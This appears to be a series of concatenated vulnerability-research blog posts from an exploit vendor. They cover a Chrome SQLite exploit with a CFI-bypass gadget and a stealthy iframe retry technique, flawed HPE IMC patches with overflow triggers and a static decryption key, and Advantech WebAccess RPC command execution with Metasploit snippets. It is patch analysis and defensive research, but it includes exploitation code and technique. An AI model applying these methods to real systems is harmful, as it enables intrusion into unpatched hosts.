The entire process is illustrated below.
This is why we only need exactly one gadget to control $RIP: we can AAR our way to the return address's location within the stack. From there, it is just standard ROP to execve or system.
The Chrome executable is huge, weighing in at 130MB, because it is statically compiled to include every library except the standard ones. Therefore, there is no shortage of ROP gadgets to choose from. The only problem is that extracting the gadgets can take a very long time. On the first round of ROP gadget extraction, we weren't able to find a suitable stack pivot gadget. This is because the ROP stack is littered with values needed by the AAW vfgadget to make the AAW work properly; the stack pivot needs to dodge all of those values and pick up the empty slots within the ROP stack. This led us to run the ROPgadget tool with --depth=20, which ran for 48 hours on the 130MB binary inside a virtual machine. While ROPgadget was running, we casually went through the remaining vfgadget list, hoping to find another relatively simple AAW vfgadget that didn't litter the ROP stack as much. During that process, we found a completely different way to bypass the CFI.
Bypassing CFI by gaining direct code execution
It turns out that the statement "CFI is universally applied to all indirect function calls" is false. We realized this after discovering the following gadget.
We were awestruck upon discovering this vfgadget. It completely dodges the CFI, making a direct call to a virtual function and voiding all checks. What is even more remarkable is that this gadget also provides $RDI and $RSI with a completely clean ROP stack to work with. It's as if someone left it there with the intention of "use THIS GADGET to bypass the CFI *wink*". This vfgadget is clearly the winner of all vfgadgets: the golden vfgadget that bypasses CFI in one fatal blow. We give our sincere appreciation to whoever contributed to its making.
All jokes aside, the only plausible explanation for why this function was left uninstrumented is that it operates on tagged pointers. It seems that the current CFI implementation baked into the compiler gets easily confused by direct arithmetic on pointer values, as shown on line 8 of the above listing. Thanks to this vfgadget, we can jump directly to the stack pivot gadget and ROP from there, entirely skipping AAW. Our exploit used the previous AAW method, since the appropriate stack pivot gadget had already been found, but this one would have been much preferable had it been discovered earlier.
Making a Stealth Exploit by abusing Chrome’s Site Isolation
Chrome offers a mitigation called Site Isolation. Here is the description of Site Isolation, borrowed from the Chromium webpage.
Site Isolation has been enabled by default in Chrome 67 on Windows, Mac, Linux, and Chrome OS to help to mitigate attacks that are able to read otherwise inaccessible data within a process, such as speculative side-channel attack techniques like Spectre/Meltdown. Site Isolation reduces the amount of valuable cross-site information in a web page’s process, and thus helps limit what an attacker could access.
In addition, Site Isolation also offers more protection against a certain type of web browser security bug, called universal cross-site scripting (UXSS). Security bugs of this form would normally let an attacker bypass the Same Origin Policy within the renderer process, though they don’t give the attacker complete control over the process. Site Isolation can help protect sites even when some forms of these UXSS bugs occur.
There is additional work underway to let Site Isolation offer protection against even more severe security bugs, where a malicious web page gains complete control over its process (also known as “arbitrary code execution”). These protections are not yet fully in place.
To summarize, Site Isolation mitigates CPU side-channel attacks and protects against UXSS logic bugs. However, it does not protect against gaining UXSS after achieving remote code execution through a renderer bug. Site Isolation is also interesting from another perspective: an exploiter's point of view. Here's another quote borrowed from the site.
Site Isolation offers a second line of defense to make such attacks less likely to succeed. It ensures that pages from different websites are always put into different processes, each running in a sandbox that limits what the process is allowed to do. It will also make it possible to block the process from receiving certain types of sensitive data from other sites. As a result, a malicious website will find it more difficult to steal data from other sites, even if it can break some of the rules in its own process.
The important part is emphasized. What this means is that all frames that open a different site from the parent frame, are running in different processes. This can be observed with a little experimentation.
➜ site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
6
➜ site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
7
➜ site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
8
➜ site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
9
➜ site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
10
As more iframes from different sites are added, more processes pop up. This is interesting from an exploitation point of view. What happens if an iframe running in a different process crashes?
It does not take down the parent window along with it. It just crashes the process containing the iframe. Does it work with multiple iframes?
Confirmed. What if the iframe is barely visible?
The parent frame lives, and there is no visible indication on the screen that the child iframes crashed.
What this provides to an exploit writer is three things.

1. On every failed exploit attempt, a new iframe can be launched, giving the exploit a practically unlimited number of retries.
2. If the iframe is vanishingly small, there is no on-screen indication of exploit failure; the 'Aw, Snap!' page is contained within the invisible iframe.
3. Each iframe launches a new process, and all exploit activity is contained within that process. Whatever busy activity happens in the parent frame will not affect the child frame.

These are great characteristics for an exploit. All of these factors contribute to enhancing its reliability and make it resilient to failures.
For our exploit, since it runs for a fair amount of time, we simulated a scenario where the victim is lured into playing a game of Zelda while the exploit runs in an iframe in the background. The developer console is opened to show the exploit working behind the scenes.
The exploit works on all Ubuntu versions, because all exploit primitives are based on the Chrome binary itself and do not rely on any offsets from system libraries. To actually pop the calculator, Chrome needs to be run with the --no-sandbox flag. Otherwise, the exploit needs to be packed with a reflective ELF payload armed with a sandbox escape in order to pop the calculator.
The entire exploit code can be found on our github.
Increasing Speed and Reliability
We will talk about reliability first, because everything about it has been covered in the previous sections. To increase reliability, the sources of failure must be identified and fixed. Each stage discussed its own sources of unreliability and ways to avoid them, but this obviously doesn't cover all failure modes. While fixing them one by one, new and completely unexpected issues will pop up and be added to the to-fix list. It is wise to fix only the major sources of failure and leave the minor ones as-is until reliability exceeds roughly 80%, then let the site isolation technique described above handle the rest by retrying. That is a good tradeoff between creating a good-enough exploit and the time invested in increasing reliability.
Now let's talk about reducing the execution time of the exploit. The major source of delay is obviously the spraying phase, so it has to be addressed to increase speed. But spraying is an essential requirement of the exploit: how else could we perform an OOB write to a target object that is 2GB away from the source object? The answer is that we keep spraying, but spray in an efficient way. How is this possible?
The results show that even though the program successfully allocated 4GB of memory, it took a mere millisecond to complete. This is because Linux uses an optimistic memory allocation strategy: the memory is allocated, but it is not actually backed by physical pages until data is written to it. More importantly, since only 0x200 bytes are written to the 4GB chunk, all the time spent writing data to the heap is saved, while still allocating a huge chunk. This makes it possible to spray the heap very quickly without writing actual data to it. It is a great primitive, because the 2GB heap spray we jump over does not require actual data in it; it only needs to occupy space on the heap for the OOB write to land beyond. All we need to do is find such a primitive.
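The behavior can be sketched in a few lines (an anonymous mapping stands in for the malloc'd chunk, and the size is reduced to 1 GiB here):

```python
import mmap
import time

SIZE = 1 << 30                   # 1 GiB anonymous mapping (the exploit uses ~4 GiB)

t0 = time.perf_counter()
m = mmap.mmap(-1, SIZE)          # virtual space is reserved, but no physical pages yet
m[:0x200] = b"A" * 0x200         # only these 0x200 bytes ever get committed
elapsed = time.perf_counter() - t0

print(f"mapped {SIZE >> 20} MiB and wrote 0x200 bytes in {elapsed * 1000:.2f} ms")
```

On an overcommitting Linux system this completes almost instantly, because the kernel only backs the touched pages with physical memory.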
Such a primitive was not actively searched for in the course of building the exploit. However, just a short glance at the commit logs of SQLite reveals a wealth of heap spray candidates to choose from, and some of them could very well meet the conditions described above.
SQLite is not the only source of such primitives. Since the TCMalloc heap is shared by all threads and managed by the Central Cache, a heap spray performed from any other thread also makes a good candidate. Spraying in Thread 1 and then spraying in Thread 2 will make the chunks in Thread 2 adjacent to the ones sprayed in Thread 1. There will be a small gap of a couple of pages, but they will essentially be close to each other. Therefore, any heap spray from any kind of functionality in Chrome that is backed by malloc/new makes a good candidate. The best places to look for such sprays are components that parse complex formats; font or media parsing functionality would be prime candidates. Finding a new heap spray primitive that can place arbitrary data on the heap would fill in the missing piece of the alternative exploitation strategy described in Stage 10.
Before ending the blogpost, let's talk about how to take advantage of these new primitives and build a new exploitation strategy.
The new primitives will be named P1 and P2, respectively. P1 creates a heap chunk of any size without having to fill its entire content. P2 creates a heap chunk of any size and fills it with attacker-controlled arbitrary content. In order to refine the exploit strategy, the handling of the fts3 root node that contains our OOB chunk for apple needs to be revisited.
static int fts3SegReaderNext(
  Fts3Table *p,
  Fts3SegReader *pReader,
  int bIncr
){
  int rc;               /* Return code of various sub-routines */
  char *pNext;          /* Cursor variable */
  int nPrefix;          /* Number of bytes in term prefix */
  int nSuffix;          /* Number of bytes in term suffix */
The vulnerable function is also pasted above for reference.
Term 1 is the same. Term 2 has been updated to reallocate the apple chunk into a huge chunk. The check on line 21 evaluates (0x3FFFC000 + 1) > 0, which enters the if clause and reallocates the chunk based on the calculation on line 22 to slightly less than 2GB; let's say 1.9GB. Afterwards, the memcpy merely copies a single byte "A" into the middle of the 1.9GB chunk. This strikes away all the memcpy time while still allocating a huge chunk. The vulnerability is not actually triggered yet; Term 2 only serves to relocate the 0x10-byte apple chunk into a 1.9GB chunk. Next, Term 3 is parsed and the bug is triggered the same way as in the original exploitation strategy. But since (0x7FFFFFFF + 1) is a negative value, the check on line 21 is bypassed and execution runs straight to the memcpy, which writes out-of-bounds at an address 0x7FFFFFFF bytes past the start of the 1.9GB chunk, just as in the previous stages. The only difference is that apple no longer resides in a 0xa00-byte chunk but in a 1.9GB one.
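The signed-comparison behavior of the line-21 check can be modeled in a few lines (a sketch only: the check is reduced to a comparison against zero, matching the values quoted above):

```python
from ctypes import c_int

def passes_line21_check(nPrefix: int, nSuffix: int) -> bool:
    # (nPrefix + nSuffix) is evaluated as a signed 32-bit integer
    return c_int(nPrefix + nSuffix).value > 0

# Term 2: 0x3FFFC000 + 1 stays positive, so the realloc branch is entered
print(passes_line21_check(1, 0x3FFFC000))   # True
# Term 3: 0x7FFFFFFF + 1 wraps to a negative value, bypassing the check
print(passes_line21_check(1, 0x7FFFFFFF))   # False
```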
The new exploitation strategy will be like the following.
This is the new, refined exploit strategy to increase speed. Since most of the heap spraying is done with P1, which is lightning fast and doesn't actually fill in any heap data, the entire spraying and probing process up to Stage 7 will likely be reduced to less than 10 seconds. This would make the exploit practical and deployable in the real world. We haven't gone down this route due to time constraints, but we present it here in case anyone wants to explore the concept.
Also worth mentioning is that this tactic could probably have been used to exploit Chrome on Windows. This is because apple no longer lives in the Low Fragmentation Heap, but in a separate heap allocated by NtAllocateVirtualMemory. This makes it possible to have the 1.9GB chunk allocated at a relatively fixed location (it moves around a little due to the guard page size), without being subject to the randomization of the LFH. To eliminate even that slight randomization completely, the Variable Size Allocation subsegment would also make a good target to place apple in. It would have been interesting to see this bug actually used to compromise Chrome during Pwn2Own.
Conclusion
Finally, in terms of reliable N-day exploits for Chrome, there are much better bugs for achieving speed and reliability, owing to their characteristics. The prime candidates are bugs in the V8 JIT engine, such as _tsuro's excellent V8 bug in Math.expm1. Our N-day feed provides in-depth analysis and exploits for other kinds of V8 JIT bugs. An Exodus nDay subscription can be leveraged by red teams to gain a foothold in the enterprise during penetration tests, even when critical details about public vulnerabilities have been obscured (as with the Magellan bug) or when a public exploit simply does not exist.
This post highlights several mistakes in the patches released for vulnerabilities affecting various services of HPE Intelligent Management Center, with a focus on its native binaries.
Author: István Kurucsai
During our work on N-day vulnerabilities, we encounter many different issues with security patches that can leave users of the affected product at risk even if they keep their systems up-to-date. Some fixes don’t attempt to address the underlying vulnerability but apply trivial changes that break the provided proof-of-concept exploit. Examples include removing the specific path used to trigger the issue while leaving others available or adding a layer of encryption to the communication protocol to which the exploit could easily be adapted. Other times, new vulnerabilities are introduced as a result of the code changes or previously unreachable vulnerabilities become exposed. Sometimes the fix is simply incorrect, e.g. it adds a new check for the wrong function call or with the wrong boundary conditions. There are cases where the original analysis of the vulnerability by the security researcher is incomplete, therefore the fixes and detection filters based on it are likely to be incomplete, too. And then there are the patches that don’t actually contain any relevant changes and the vulnerability remains exploitable while the issue is marked as resolved.
HPE Intelligent Management Center is a network management platform with a history of a wide range of vulnerabilities affecting it. It has a vast attack-surface, including web based components and native binaries implementing custom protocols. While the analysis was done on the Linux releases of IMC, it is important to note that the Windows and Linux versions are compiled from the same code base and share the same vulnerabilities.
Hiding Vulnerabilities
A common mistake we encounter during our day-to-day work is when a patch only removes a possible path for triggering the vulnerability instead of actually fixing the issue. A prime example of this is the attempts made at patching several issues affecting the dbman service, which is responsible for the backup and restoration of the databases used by IMC. The Linux version doesn’t have stack cookies and isn’t compiled as PIE. It listens on TCP port 2810 and expects a simple packet header consisting of an opcode and the data length, followed by a DER encoded ASN.1 message. Several vulnerabilities affecting it, including command injections, an arbitrary file write and a stack buffer overflow were published by ZDI in 2017 under the identifiers ZDI-17-336 through ZDI-17-343 and ZDI-17-481 through ZDI-17-484. These are quite similar in nature and close to each other in the code base. Let’s take a quick look at ZDI-17-336/CVE-2017-5820, titled Hewlett Packard Enterprise Intelligent Management Center dbman Opcode 10004 Command Injection Remote Code Execution Vulnerability.
Without going into too much detail, opcode 10004 corresponds to the BackupZipFile operation of dbman. After parsing the packet header and the ASN.1 message, control flow ends up in the CDbBackup::BackupOneLocalZipFile method, which constructs a command line that includes unescaped data from several message fields. This command line is then passed to the runCommand function, which is a wrapper around system, resulting in a command injection vulnerability. For the code snippet below, note that OneZipFileBackupObj is the parsed, unsanitized message from the packet.
SNACC::AsnRet *__userpurge CDbBackup::BackupOneLocalZipFile@(
    SNACC::AsnRet *retstr,
    const CDbBackup *const this,
    SNACC::AsnOneZipFileBackupPara *const OneZipFileBackupObj,
    int ifHost)
{
In the HPE Security Bulletin corresponding to ZDI-17-336/CVE-2017-5820, the first patched version is indicated as IMC PLAT 7.3 E0504P04. Looking at the supposedly patched 7.3 E0506 version, the CDbBackup::BackupOneLocalZipFile function seems identical, containing the same vulnerability. Examining its caller, BackupZipFile, the only difference is that a new function, dbman_decode_len, is invoked before the ASN.1 decoding. It is a rather short method, decrypting the input using DES in ECB mode with a static key, which is liuan814 in version 7.3 E0506.
Examining the call sites for dbman_decode_len, they correspond to the opcodes implicated in the published vulnerabilities, meaning that this is the supposed fix for the issues. While this breaks exploits developed for previous versions of IMC, it’s in no way a proper patch. Simply encrypting the message with the static key enables exploitation of the original vulnerabilities.
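A minimal sketch of what an adapted exploit would need to send is below. The header layout and endianness are assumptions based on the description above, and the DES-ECB step itself is omitted; the payload argument stands for the already-encrypted DER message:

```python
import struct

def frame_dbman_request(opcode: int, payload: bytes) -> bytes:
    # hypothetical framing per the description above: an opcode and data
    # length header followed by the (DES-ECB encrypted) ASN.1 body;
    # byte order and field widths are assumptions
    return struct.pack(">II", opcode, len(payload)) + payload

# payload would be the DER message encrypted with the static key (liuan814)
pkt = frame_dbman_request(10004, b"\x00" * 16)
```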
The Second Fix
Looking at the newest version (7.3 E0605H05), the vulnerabilities are still present, unpatched. However, the encryption scheme was altered. dbman_decode_len became a simple wrapper around decryptMsg, which reads in keying material from two files in the IMC installation directory, common\conf\ks.dat and server\conf\imchw.conf. This is then used to derive a 256-bit IV and encryption key. These are passed into decryptMsgAes, along with the incoming data from the message, which decrypts it using AES_256_CBC and processing of the message continues as before.
The contents of the ks.dat and imchw.conf are randomly generated upon install or update of the product, therefore interacting with the handlers of the vulnerable message types is impossible without having access to those files. However, IMC has a significant attack-surface and any file read or write vulnerability can be turned into a command injection by leaking or overwriting the key files and triggering the original vulnerabilities. It should also be noted that both schemes are only applied to opcodes in which vulnerabilities were reported, other opcodes remain reachable as before.
New Vulnerability Introduced In The Second Fix
Looking at the decryptMsgAes function, it can be seen that a new vulnerability was introduced that results in a stack buffer overflow. For the code snippet below, note that src is the message read from the network, iEncLen is its length and strDecrypt is a heap allocated buffer in which the decrypted message is passed back to the caller. While there are no meaningful limits on the length of the input message, the code assumes that when decrypted, it fits into 4096 bytes. EVP_DecryptUpdate is part of the OpenSSL library and its documentation states that
the decrypted data buffer out passed to EVP_DecryptUpdate() should have sufficient room for (inl + cipher_block_size) bytes
The variable iEncLen corresponds to inl from the above quote. Since the input can be larger than 4096 bytes, a stack-based buffer overflow can be triggered on line 16 of the snippet below. There’s also the possibility for a heap buffer overflow on lines 20-21 but EVP_DecryptFinal will fail on incorrect padding and it’s impossible to create valid padding without knowing the IV and key. Even though the overflow contents cannot be controlled without knowing the AES key and IV, when combined with a file read or write vulnerability to leak or change the keying material, this issue could be turned into a reliable exploit.
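The mismatch can be spelled out numerically (buffer and block sizes taken from the analysis above):

```python
BLOCK = 16               # AES-256-CBC cipher block size
STACK_BUF = 4096         # size the caller assumes for the decrypted output

def out_buffer_needed(inl: int) -> int:
    # OpenSSL requires the out buffer to hold (inl + cipher_block_size) bytes
    return inl + BLOCK

print(out_buffer_needed(4096) > STACK_BUF)     # True: overflows even at exactly 4096
print(out_buffer_needed(0x2000) - STACK_BUF)   # bytes written past the buffer
```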
This vulnerability remains unpatched for the time being.
Failed Patches
It’s not uncommon for us to see patches that attempt to solve the root cause of an issue but fail to do so.
Stack Buffer Overflow In tftpserver
The IMC suite includes a TFTP server, implemented by the tftpserver service, which is used to distribute configuration files for devices. The TFTP protocol supports setting the blksize option on a connection, which allows the client and server to negotiate a blocksize more applicable to the network medium. This option is also supported by tftpserver and can be set by a client to an arbitrary 4-byte value as can be seen on the code snippet from the 7.3 E0506 version shown below.
Later on, this value is used to determine not only the block size for the network transmission but also for the file read and write operations. In the TFTP::handleRRQ function, which is responsible for the handling of RRQs (file read requests by the client), the contents of the requested file are read in blksize sized chunks into a fixed size stack buffer of 10000 bytes, as shown below.
The TFTP::getFileData function reads in the requested number of bytes into the stack buffer using fread (code below). Since m_pkg_LimitSize is attacker-controlled, this results in a stack buffer overflow, exploitable by first uploading the payload file to the server using a write request, then setting the blksize option to a value larger than 10000 and requesting the same file via a read request.
int __cdecl TFTP::getFileData(TFTP *const this, const char *filename, int pos, int size, char *buf)
{
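A rough sketch of the read request that would trigger the overflow is below, using standard RFC 1350/2347 option framing; the filename is illustrative:

```python
import struct

def tftp_rrq_with_blksize(filename: str, blksize: int) -> bytes:
    # RRQ is opcode 1; the filename, transfer mode, and option name/value
    # are NUL-terminated ASCII strings per RFC 1350 and RFC 2347
    return (struct.pack(">H", 1) +
            filename.encode() + b"\x00" +
            b"octet\x00" +
            b"blksize\x00" +
            str(blksize).encode() + b"\x00")

# request the previously uploaded payload with a block size larger
# than the 10000-byte stack buffer
pkt = tftp_rrq_with_blksize("payload.bin", 20000)
```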
HPE released a bulletin for the vulnerability, which states that it is fixed in version 7.3 E0605P04. Examining the updated tftpserver binary, the only relevant change seems to be in the TFTP::getFileData function, in which a check was added to ensure that the size variable passed in is below 65536 (0x10000), as shown on the following code extract.
      }
    }
  } else {
    v5 = -1;
    XLOG::LogError(-1, "[TFTP::getFileData] Data is too large, more than 64k.");
  }
  return v5;
}
There are multiple issues with this. As established previously, the buf argument points to a stack buffer that is 10000 bytes in size, so the check still allows an overflow of more than 50KB. Besides that, the size argument is a signed integer and blksize is also stored as a signed integer with an arbitrary value, meaning that negative values also pass the check.
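Both problems can be demonstrated with a short model of the patched check (the comparison is reduced to its signed form):

```python
from ctypes import c_int

BUF_SIZE = 10000         # actual stack buffer in TFTP::handleRRQ
PATCH_LIMIT = 0x10000    # limit introduced by the 7.3 E0605P04 patch

def patched_size_check(size: int) -> bool:
    # size is compared as a signed 32-bit integer
    return c_int(size).value < PATCH_LIMIT

print(patched_size_check(0xFFFF))        # True, yet 0xFFFF > 10000: still overflows
print(patched_size_check(0x80000000))    # True: wraps negative and passes the check
```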
The latest version of IMC, v7.3 (E0605H05), was released on 08-Oct-2018 and still contains this incorrect fix.
The LogMsg Stack Buffer Overflows
An issue that took two iterations to patch properly is the vulnerability in the LogMsg method of the dbman service. The code of the function from version 7.3 E0504 can be seen below. As the name suggests, it’s used to log diagnostic messages. Accordingly, it has around 500 call-sites, many with arbitrarily long attacker-controlled data in the message, which can all result in a stack buffer overflow on line 10.
The vulnerability was patched in version 7.3 E0504P04, according to the HPE security bulletin. The fixed code is shown below and looks OK from a cursory glance, the length of the data written is limited by the use of the vsnprintf function.
However, the Msg buffer is then passed to the LogMsg_P function, which writes the data to the appropriate log file. It suffers from the same vulnerability as LogMsg. Even though the destination buffer on line 13 below is 8192 bytes long and the length of Msg is limited to 8192 bytes by the patch, there are up to a hundred bytes prepended to the actual message, so that the sprintf call can still write out-of-bounds. What is interesting is that triggering the original vulnerability is impossible without also triggering the one in LogMsg_P, meaning that the change probably wasn’t tested at all.
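The arithmetic of the residual overflow is simple (the prefix length is an approximation from the analysis above):

```python
DEST_BUF = 8192      # destination buffer in LogMsg_P
MSG_CAP = 8192       # vsnprintf limit added by the first patch
PREFIX = 100         # approximate bytes (level, function name, ...) prepended

worst_case = PREFIX + MSG_CAP
print(worst_case - DEST_BUF)   # up to ~100 bytes written past the buffer
```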
int __cdecl LogMsg_P(int Level, char *FuncName, char *Msg)
{
The second attempt replaced the sprintf call in LogMsg_P with an appropriately sized snprintf, actually fixing the issue. During the six-month period between the release of the two bulletins, IMC installations remained vulnerable to a supposedly patched vulnerability.
Conclusion
The N-day feed of Exodus provides detailed analysis of publicly disclosed security issues. These include many similar cases, where a vulnerability continues to pose a threat even after applying the vendor-supplied patch. It enables our customers to assess the real risks associated with vulnerabilities and implement proper detection and defensive measures. With our rigorously tested exploit code (supplied as part of the feed), organizations no longer need to rely on minimal proof of concepts that are usually available publicly. Our offerings can be leveraged by Red Teams to gain a foothold in the enterprise during penetration tests even when public exploit code does not exist or is simply unreliable.
During our day-to-day research of N-day vulnerabilities at Exodus, we often come across public advisories containing incorrect root cause analysis of the underlying vulnerability. This blogpost details one such vulnerability in Advantech WebAccess, a software suite used for managing SCADA environments. Although the vulnerability in question has been analyzed numerous times by multiple researchers, we discovered that every advisory and public exploit incorrectly cited "directory traversal" as a factor. Consequently, detection guidance based solely on the public advisories would be ineffective, as it would likely involve scanning for path traversal characters that aren't even required to exploit the vulnerability.
Additionally, this vulnerability (and several others within Advantech WebAccess) can be reached via multiple paths, a fact which we believe hasn’t been widely addressed by other blogposts/exploits.
Improper Root Cause Analysis
The vulnerability in the 0x2711 IOCTL, which is reachable over an RPC service, has been disclosed twice by the ZDI, as ZDI-18-024 and ZDI-18-483, and each time it was described as a "directory traversal" vulnerability. Both advisories also claimed it was patched by the vendor, until Tenable published a blogpost showing it was still unpatched.
While the blogpost correctly mentioned that the lpApplicationName was set to NULL and that an attacker controlled string could be eventually passed to the CreateProcessA API as the lpCommandLine parameter, it was surprising to note the use of path traversal characters in the PoC code, given the fact that directory traversal isn’t even required to execute binaries located outside the application’s directory.
Referring to Microsoft’s documentation of the CreateProcessA API, one can observe the following:
“If lpApplicationName is NULL, the first white space–delimited token of the command line specifies the module name. If you are using a long file name that contains a space, use quoted strings to indicate where the file name ends and the arguments begin (see the explanation for the lpApplicationName parameter). If the file name does not contain an extension, .exe is appended. Therefore, if the file name extension is .com, this parameter must include the .com extension. If the file name ends in a period (.) with no extension, or if the file name contains a path, .exe is not appended. If the file name does not contain a directory path, the system searches for the executable file in the following sequence:
The directory from which the application loaded.
The current directory for the parent process.
The 32-bit Windows system directory. Use the GetSystemDirectory function to get the path of this directory.
The 16-bit Windows system directory. There is no function that obtains the path of this directory, but it is searched. The name of this directory is System.
The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
The directories that are listed in the PATH environment variable. Note that this function does not search the per-application path specified by the App Paths registry key. To include this per-application path in the search sequence, use the ShellExecute function.”
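The quoted search order can be modeled with a short sketch. The function name, directory constants, and return convention here are our own; this is an approximation of the documented behavior, not the real resolver:

```python
import os

def resolve_module(name, app_dir, cwd):
    # approximate the CreateProcessA search for a bare module name
    if not os.path.splitext(name)[1]:
        name += ".exe"                      # .exe appended when no extension is given
    candidates = [
        app_dir,                            # directory the application loaded from
        cwd,                                # current directory of the parent process
        r"C:\Windows\System32",             # 32-bit system directory
        r"C:\Windows\System",               # 16-bit system directory
        r"C:\Windows",                      # the Windows directory
    ] + os.environ.get("PATH", "").split(os.pathsep)
    for directory in candidates:
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            return path
    return None
```

Passing a bare name such as "calc" would be resolved against each candidate directory in turn, which is why no traversal sequences are needed.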
From this description it is apparent that no directory traversal is needed to execute a command like "calc.exe". Let's try to visualize the search process using some Metasploit code which triggers calc.exe using RPC opcode 0x1.
rpcBuffer = NDR.long(connId) +                         # connection ID
            NDR.long(0x2711) +                         # vuln IOCTL
            NDR.long(0) +
            NDR.UniConformantArray("calc.exe\x00")     # string passed to CreateProcessA()
dcerpc_call(0x1, rpcBuffer)
In the code above one creates an RPC buffer with the connection ID obtained via RPC opcode 0x4, the vulnerable IOCTL code, and the command to execute as a NULL terminated string, which will be passed to CreateProcessA. Once this buffer is created, it will be sent to the vulnerable Advantech WebAccess RPC server using RPC opcode 0x1, at which point a search operation will be conducted to find the location where calc.exe is located. This can be seen in the screenshot below.
Windows searching for the location of the calc.exe binary
Therefore, as a result of CreateProcessA’s behavior, an attacker could either choose to supply the full path to an executable file or provide just the executable filename and Windows would automatically locate and execute that binary based on the criteria given above. As a result, defenders cannot simply rely on detecting the presence of directory traversal characters to determine if the same IOCTL request is being abused for malicious purposes.
This proves that the aforementioned vulnerability can be categorized as an arbitrary command execution vulnerability and no directory traversal is required for its exploitation.
The Vulnerable Code Exists In Two Locations (Not One)
The vulnerable implementation of 0x2711 IOCTL is contained in two binaries, namely drawsrv.dll and viewsrv.dll. Tenable’s analysis only uncovered the implementation in drawsrv.dll and did not cover the vulnerable code located in viewsrv.dll. The alternative code path can be seen in the image below.
The code flow to this branch is the result of a subtle comparison made at 0x404838 within sub_4046D0 as shown below. Within this code, a comparison is made to see whether the connection type associated with a client’s RPC session is of type 0, in which case VsDaqWebService is called, or 2, in which case DsDaqWebService is called.
.text:00404838  mov     eax, [esi+14h]
.text:0040483B  test    eax, eax        ; check connType value
.text:0040483D  jnz     short check_for_DsDaqWebService
.text:0040483F  cmp     ebx, 2710h
.text:00404845  jl      ioctl_not_in_0x2710_0x4e20_range
.text:0040484B  cmp     ebx, 4E20h
.text:00404851  jge     ioctl_not_in_0x2710_0x4e20_range
.text:00404857  push    esi             ; proceed to call VsDaqWebService
.text:00404857                          ; located further down
.text:00404858  mov     ecx, edi
.text:0040485A  call    sub_4045B0
.text:0040485F  test    eax, eax
.text:00404861  jz      short ioctl_not_in_0x2710_0x4e20_range
.text:00404863  mov     eax, [esi+4]
.text:00404866  test    eax, eax
.text:00404868  jz      short ioctl_not_in_0x2710_0x4e20_range
.text:0040486A  mov     eax, [esi+8]
.text:0040486D  test    eax, eax
.text:0040486F  jz      short ioctl_not_in_0x2710_0x4e20_range
.text:00404871  push    offset sub_403190
.text:00404876  mov     ecx, [ebp+arg_14]
.text:00404879  push    ecx
.text:0040487A  mov     edx, [ebp+Dest]
.text:0040487D  push    edx
.text:0040487E  mov     ecx, [ebp+arg_C]
.text:00404881  push    ecx
.text:00404882  mov     esi, [ebp+Str1]
.text:00404885  push    esi
.text:00404886  push    ebx
.text:00404887  mov     edx, [ebp+arg_4]
.text:0040488A  push    edx
.text:0040488B  call    eax             ; VsDaqWebService
.text:0040488D  mov     ecx, [ebp+arg_1C]
.text:00404890  mov     [ecx], eax
.text:00404892  jmp     short loc_4048DE
.text:00404894 ; ---------------------------------------------------------------------------
.text:00404894
.text:00404894  check_for_DsDaqWebService:      ; CODE XREF: sub_4046D0+16D↑j
.text:00404894  cmp     eax, 2
.text:00404897  jnz     short ioctl_not_in_0x2710_0x4e20_range
.text:00404899  cmp     ebx, 2710h
.text:0040489F  jl      short ioctl_not_in_0x2710_0x4e20_range
.text:004048A1  cmp     ebx, 4E20h
.text:004048A7  jge     short ioctl_not_in_0x2710_0x4e20_range
.text:004048A9  push    esi             ; proceed to call DsDaqWebService
.text:004048A9                          ; located further down
.text:004048AA  mov     ecx, edi
.text:004048AC  call    sub_4045B0
.text:004048B1  test    eax, eax
.text:004048B3  jz      short ioctl_not_in_0x2710_0x4e20_range
.text:004048B5  push    offset sub_403190
.text:004048BA  mov     edx, [ebp+arg_14]
.text:004048BD  push    edx
.text:004048BE  mov     eax, [ebp+Dest]
.text:004048C1  push    eax
.text:004048C2  mov     ecx, [ebp+arg_C]
.text:004048C5  push    ecx
.text:004048C6  mov     esi, [ebp+Str1]
.text:004048C9  push    esi
.text:004048CA  push    ebx
.text:004048CB  mov     edx, [ebp+arg_4]
.text:004048CE  push    edx
.text:004048CF  call    DsDaqWebService
It can also be seen that the code handling the vulnerable 0x2711 IOCTL in both binaries looks nearly identical.
Interestingly, the value on which the comparison is performed comes from a different request, not the 0x2711 IOCTL request itself. This other request, based on RPC opcode 0x4, has been described in detail by previous research such as ZDI's. Instead of repeating that analysis, it suffices to say that the compared value results from the connType value supplied as part of the request, as can be seen in the listing of opcode 0x4 shown below.
As a result, an attacker can target the vulnerable code in both binaries just by changing the connType value as can be seen in the Metasploit code shown below.
While reviewing other publicly documented RPC vulnerabilities in Advantech WebAccess, we discovered that the usual trend was to trigger a vulnerability using one specific RPC opcode, while in reality it could be triggered using multiple opcodes. This doesn't bode well for defenders, as an attacker could trigger the same vulnerability using a different opcode and thereby bypass a signature meant to fire on a specific opcode request.
The arbitrary command execution vulnerability in the 0x2711 IOCTL is also reachable over opcode 0x0, in addition to opcode 0x1 as shown in the earlier code. The modified code to trigger it using opcode 0x0 is shown below.
# Triggering CreateProcessA() in viewsrv.dll using opcode 0x0
Users of Advantech WebAccess are advised to set a Remote Access Code during installation to protect the RPC service from unauthorized requests. The screen for setting up the code is shown below.
Additionally, users can set up a remote access code per project, as shown below.
Conclusion
It should be apparent by now that keeping up-to-date on vendor patches or relying on public advisories isn't good enough. One needs to dig deep into a patch and analyse it to know whether it actually fixed the vulnerability it was supposed to. Furthermore, all paths leading to the vulnerable code need to be analysed in order for companies to provide complete detection for a vulnerability.
The information mentioned in this blogpost has been available to our N-day feed subscribers since January 2018 when the first public advisory about the vulnerability was released. It has enabled them to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor and the lack of correct information in public advisories.
In this blog post, we examine the vendor-supplied patch addressing CVE-2018-6661. The vulnerability was initially reported to Intel Security (McAfee) in June 2017 and disclosed publicly in April 2018. Additionally, we contacted McAfee regarding the issues discussed in this post in August 2018.
Contributors: Omar El-Domeiri and Gaurav Baruah
At Exodus, we often encounter failed patches or discover adjacent zero-day vulnerabilities while conducting n-day vulnerability research. In 2018, our team has identified 24 publicly disclosed vulnerabilities that were reportedly patched but, in fact, were still vulnerable because the patch did not address the root cause. Failed patches can leave users at risk even if they vigilantly keep up with software updates and security advisories.
